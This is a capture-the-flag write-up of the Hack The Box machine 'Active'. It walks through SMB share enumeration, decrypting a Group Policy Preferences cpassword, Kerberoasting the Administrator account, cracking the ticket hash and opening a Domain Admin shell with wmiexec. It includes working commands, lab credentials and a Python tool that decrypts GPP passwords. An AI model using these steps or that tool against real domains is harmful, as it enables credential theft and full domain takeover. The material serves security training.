
HTB Active

![[Pasted image 20221004114359.png]]

SYNOPSIS

Skills Required

  • Basic knowledge of Active Directory authentication and shared folders

Skills Learned

  • SMB enumeration techniques
  • Enumerating and exploiting Group Policy Preferences (Groups.xml)
  • Identifying and exploiting Kerberoastable accounts

Enumeration

Port scan (masscan for the full range, then nmap service/script detection on the open ports only)

masscan -p1-65535 10.129.125.59 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

nmap -Pn -sV -sC -p$ports 10.129.125.59

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-10-04 05:56:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-10-04T05:57:15
|_  start_date: 2022-10-04T03:40:06
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required


Enumerating port 445 with nmap's safe scripts

$ nmap --script safe -p445 10.129.125.59
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 07:14 BST
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for active.htb (10.129.125.59)
Host is up (0.0042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 1s
|_fcrdns: FAIL (No PTR record)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time: 
|   date: 2022-10-04T06:15:30
|_  start_date: 2022-10-04T03:40:06
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| dns-blacklist: 
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| smb-protocols: 
|   dialects: 
|     2.0.2
|_    2.1
| port-states: 
|   tcp: 
|_    open: 445
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

Post-scan script results:
| reverse-index: 
|_  445/tcp: 10.129.125.59

Enumerating SMB

Reference syntax for smbmap's -F option, which greps file contents on a share by regex (a generic example kept for later use; it was not run against this target and -H is left empty):

$ smbmap.py -H  -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'


$ smbclient -L //10.129.125.59
Enter WORKGROUP\htb-ovuln's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

$ smbclient //$target/Replication
Enter WORKGROUP\htb-ovuln's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 
smb: \> dir
  .                                   D        0  Sat Jul 21 11:37:44 2018
  ..                                  D        0  Sat Jul 21 11:37:44 2018
  active.htb                          D        0  Sat Jul 21 11:37:44 2018

        10459647 blocks of size 4096. 5203372 blocks available

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (2.7 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (14.5 KiloBytes/sec) (average 6.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (340.3 KiloBytes/sec) (average 87.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (65.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (107.2 KiloBytes/sec) (average 87.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (454.3 KiloBytes/sec) (average 137.5 KiloBytes/sec)

smbmap can target the Groups.xml file directly (-R recurses the share, -A downloads every file whose name matches the pattern):

$ smbmap -R Replication -H 10.129.125.59 -A Groups.xml -q

Mounting the share gives more powerful enumeration, since the whole tree can be grepped at once (the share also allows anonymous access, so -o guest works here in place of the credentials):

sudo apt install cifs-utils
sudo mkdir -p /mnt/Replication
sudo mount -t cifs //10.129.125.59/Replication /mnt/Replication -o username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication

Replication is a copy of SYSVOL, which stores Group Policy; pulling Groups.xml out of it is the privilege-escalation path (as in IppSec's walkthrough).

In smbclient, RECURSE ON and PROMPT OFF make mget * fetch the entire tree without a confirmation prompt for every file.

Group Policy Preferences (GPP)

Group Policy Preferences were introduced with Windows Server 2008 and let administrators create and modify local users and groups (among other settings) on machines across the domain. A password set this way is stored in the policy's XML file (here Groups.xml) as the cpassword attribute, encrypted with AES-256. Microsoft, however, published the AES key on MSDN in 2012, so every password ever set through GPP can be decrypted by anyone able to read SYSVOL, which is every authenticated domain user. MS14-025 (2014) removed the ability to set new passwords through GPP, but it does not delete existing cpassword entries, which is why they are still found on domain controllers years later.

$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
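An added example (not the page's code and not gpp-decrypt itself) that does what the mount-and-grep step and gpp-decrypt do together: walk a copied or mounted Replication/SYSVOL tree, pick out every GPP XML file that can carry a cpassword (Groups.xml is the common one, but Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can too), and decrypt each value with the published key. It assumes the `cryptography` package for AES; the sample tree it builds contains the Groups.xml shown above, under the same policy GUID path that mget listed.

```python
"""Sweep a SYSVOL/Replication tree for GPP cpassword values and decrypt them.
Added example; reimplements gpp-decrypt's logic, not code from the writeup or gpp-decrypt."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The AES-256 key Microsoft published in the MS-GPPREF specification.
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# GPP XML files that may carry a cpassword attribute, and the attributes that name the account.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def gpp_decrypt(cpassword: str) -> str:
    """cpassword is base64 with its '=' padding stripped; inside is AES-256-CBC (zero IV), PKCS#7, UTF-16LE."""
    ciphertext = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(bytes(16))).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key, or not a GPP cpassword")
    return padded[:-pad].decode("utf-16-le")


def find_cpasswords(root: str) -> list:
    """Walk root (e.g. /mnt/Replication) and return {file, user, password} for every cpassword found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # truncated or non-XML file: skip it rather than abort the sweep
            for elem in tree.iter():
                cpw = elem.attrib.get("cpassword")
                if not cpw:
                    continue
                user = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "<unknown>")
                findings.append({"file": path, "user": user, "password": gpp_decrypt(cpw)})
    return findings


# The Groups.xml pulled from the Replication share above (raw string keeps the backslashes intact).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""


def demo() -> list:
    """Recreate the policy path mget listed above inside a temp dir, then sweep it."""
    with tempfile.TemporaryDirectory() as root:
        policy_dir = os.path.join(root, "active.htb", "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                                  "MACHINE", "Preferences", "Groups")
        os.makedirs(policy_dir)
        with open(os.path.join(policy_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(root)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['user']}:{hit['password']}  ({hit['file']})")
```

On an engagement, point find_cpasswords() at /mnt/Replication or at the directory smbclient's mget wrote into. The padding check is what tells a real cpassword from a random base64-looking string: a value encrypted under any other key decrypts to bytes with invalid PKCS#7 padding and is rejected instead of being reported as a garbage password.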

Authenticated Enumeration

With valid credentials for the active.htb domain, further enumeration is possible: the SYSVOL and Users shares are now readable, and ldapsearch can query the domain controller for each account's userAccountControl attribute and for other specific configuration that applies to it. Many userAccountControl bits are security-relevant. Bit 2 (ACCOUNTDISABLE) marks a disabled account, so the query below, which uses the LDAP bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) to exclude accounts with that bit set, returns the enabled users of active.htb by sAMAccountName:

$ ldapsearch -x -h 10.129.241.119 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: SVC_TGS
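An added example (not from the writeup) that shows what the bitwise filter above is doing and why the other userAccountControl bits are worth reading: it builds the same filter string, decodes a userAccountControl integer into its flag names, and triages a small ldapsearch dump. The LDIF is constructed, with typical default flag values rather than the values on this box; only the domain name comes from the page, and the account "svc_legacy" is invented.

```python
"""Decode userAccountControl from ldapsearch output and build the bitwise LDAP filters.
Added example, not the writeup's code; the LDIF sample below is constructed."""
import base64

# userAccountControl bit flags (MS-ADTS); the ones worth recognising during enumeration.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Why a set bit matters to an attacker or an auditor.
UAC_FINDINGS = {
    "PASSWD_NOTREQD": "empty password permitted",
    "DONT_EXPIRE_PASSWORD": "password never expires",
    "USE_DES_KEY_ONLY": "DES-only Kerberos keys",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation",
    "DONT_REQ_PREAUTH": "AS-REP roastable (no Kerberos pre-auth)",
}

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"  # the OID used in the page's ldapsearch filter


def uac_clause(bits: int, present: bool = True) -> str:
    """(userAccountControl:<bit-AND OID>:=bits), wrapped in (!...) when present=False."""
    clause = f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bits})"
    return clause if present else f"(!{clause})"


def user_filter(enabled_only: bool = True, with_bits: int = 0) -> str:
    """user_filter() reproduces the page's enabled-users filter; with_bits=0x400000 selects AS-REP roastable users."""
    parts = ["(objectCategory=person)", "(objectClass=user)"]
    if enabled_only:
        parts.append(uac_clause(0x0002, present=False))
    if with_bits:
        parts.append(uac_clause(with_bits))
    return "(&" + "".join(parts) + ")"


def decode_uac(value: int) -> list:
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_ldif(text: str) -> list:
    """Minimal LDIF reader for ldapsearch output: blank line ends an entry, leading space folds, '::' is base64."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]  # unfold a continuation line
        else:
            lines.append(raw)
    entries, entry = [], {}
    for line in lines:
        if not line.strip():
            if entry:
                entries.append(entry)
            entry = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # attr:: <base64>
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        entry[attr.strip()] = value.strip()
    if entry:
        entries.append(entry)
    return entries


def triage(ldif_text: str) -> list:
    """One record per user entry: enabled state, decoded flags, and the findings worth following up."""
    out = []
    for entry in parse_ldif(ldif_text):
        if "userAccountControl" not in entry:
            continue
        uac = int(entry["userAccountControl"])
        flags = decode_uac(uac)
        out.append({
            "sAMAccountName": entry.get("sAMAccountName"),
            "enabled": not uac & 0x0002,
            "flags": flags,
            "findings": [UAC_FINDINGS[f] for f in flags if f in UAC_FINDINGS],
        })
    return out


# Constructed ldapsearch output; the flag values are typical defaults, not this box's.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Administrator,CN=Users,DC=active,DC=htb
sAMAccountName: Administrator
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=active,DC=htb
sAMAccountName: Guest
userAccountControl: 66082

dn: CN=svc_legacy,CN=Users,DC=active,DC=htb
sAMAccountName: svc_legacy
userAccountControl: 4260352
"""

if __name__ == "__main__":
    print(user_filter())
    for record in triage(SAMPLE_LDIF):
        print(record)
```

Save the output of `ldapsearch ... sAMAccountName userAccountControl` to a file and feed it to triage(). The DONT_REQ_PREAUTH finding is the AS-REP roasting pre-check: user_filter(with_bits=0x400000) is the LDAP query for those accounts, and Impacket's GetNPUsers.py is the tool that abuses them.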

Impacket's GetADUsers.py simplifies enumerating domain user accounts:

$ GetADUsers.py -all active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.129.241.119 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 19:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 21:14:38.402764  2022-10-07 06:05:45.308462

Exploitation

Kerberoasting

Kerberos authentication and Service Principal Names. Kerberoasting is a privilege-escalation technique in Active Directory domains: the attacker requests service tickets, extracts the encrypted part of the Ticket Granting Service reply (TGS_REP) as a crackable hash, and cracks it offline to recover the plaintext password. It works because the service ticket is encrypted with the long-term key of the account in whose context the service instance runs; with the RC4-HMAC encryption type (etype 23) that key is simply the account's unsalted NTLM hash, so each candidate password can be tested with one MD4 and a few HMAC-MD5 operations. (Tickets issued with the AES etypes 17 and 18 use a salted, PBKDF2-derived key and are far slower to crack.) ![[Pasted image 20221007134730.png]]

Managed service accounts reduce this risk because of their password complexity, but they are not actively used in many environments. Shutting down the service on the hosting server does not mitigate it either, because the attack involves no communication with the target service at all; only the domain controller is contacted. It is therefore important to audit regularly the purpose and privileges of every enabled account. Kerberos authentication uses Service Principal Names (SPNs) to identify the account associated with a specific service instance, and ldapsearch can identify the accounts that have an SPN configured:

$ ldapsearch -x -h $target -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
dn: CN=Administrator,CN=Users,DC=active,DC=htb
servicePrincipalName: active/CIFS:445

active\Administrator appears to have an SPN configured, which is exactly the misconfiguration Kerberoasting targets: a Domain Admin whose password can be attacked offline by any domain user. Impacket's GetUserSPNs.py again simplifies this step, and with -request it also asks the DC for the TGS and prints the hash for offline cracking:

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904             

$krb5tgs$23$*Adminis<SNIP>

Cracking of Kerberos TGS Hash

With hashcat or john, the password of active\administrator is cracked easily:

$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable

<SNIP>ff9726:Ticketmaster1968

$ john --format:krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ovuln/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
<SNIP>

Getting a Domain Admin shell

Impacket's wmiexec.py gives a shell as active\administrator:

$ wmiexec.py active/administrator:Ticketmaster1968@$target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>more C:\Users\administrator\Desktop\root.txt

Bonus: The "Old School" Kerberoasting Technique

There are several ways to Kerberoast from both Windows and Linux. Reproduced below is Tim Medin's original technique, which relies on functionality in Benjamin Delpy's Mimikatz to export Kerberos tickets.

On a domain-joined machine, the built-in setspn.exe utility enumerates the available SPNs and their associated accounts:

> whoami
active\svc_tgs

> setspn -T active.htb -F -Q */*

Then request the service tickets and export them from RAM (the Mimikatz step mentioned above).

SYSVOL is a domain-wide share in Active Directory that every authenticated user can read. It holds logon scripts and Group Policy data, which is what makes Group Policy Preferences exploitable from any domain account.

Domain Group Policy is stored under: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

Notes

Credentials in SYSVOL

Mining SYSVOL for credentials


Vocabulary: Service Principal Name (SPN); service instance